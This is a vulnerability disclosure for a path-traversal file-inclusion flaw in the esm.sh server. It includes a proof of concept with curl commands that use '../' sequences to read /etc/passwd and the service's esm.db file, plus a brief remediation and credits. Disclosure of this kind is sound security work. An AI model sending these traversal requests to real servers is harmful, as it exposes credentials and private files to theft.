esm.sh has File Inclusion issue

Summary

A Local File Inclusion (LFI) issue was identified in the esm.sh service URL handling. An attacker could craft a request that causes the server to read and return files from the host filesystem (or other unintended file sources).

Severity: High — LFI can expose secrets, configuration files, credentials, or enable further compromise.
Impact: reading configuration files, private keys, environment files, or other sensitive files; disclosure of secrets or credentials; information leakage that could enable further attacks.

Vulnerable code snippet is in this file: https://github.com/esm-dev/esm.sh/blob/c62f191d32639314ff0525d1c3c0e19ea2b16143/server/router.go#L1168

---

Proof of Concept

1. Using this default config file that I copy from the repo, the server is running at http://localhost:9999 with this command go run server/esmd/main.go --config=config.json

{
  "port": 9999,
  "npmRegistry": "https://registry.npmjs.org/",
  "npmToken": "******"
}

2. Trigger the LFI vulnerability by sending this command below to read a local file

# read /etc/passwd
curl --path-as-is 'http://localhost:9999/pr/x/y@99/../../../../../../../../../../etc/passwd?raw=1&module=1'

# or read the database esm.db file
curl --path-as-is 'http://localhost:9999/pr/x/y@99/../../../../../../../esm.db?raw=1&module=1'

---

Remediation

Simply remove any .. in the URL path before actually process the file. See more details in this guide

Credits

• Ai Ho (Jessie)
• CL Yang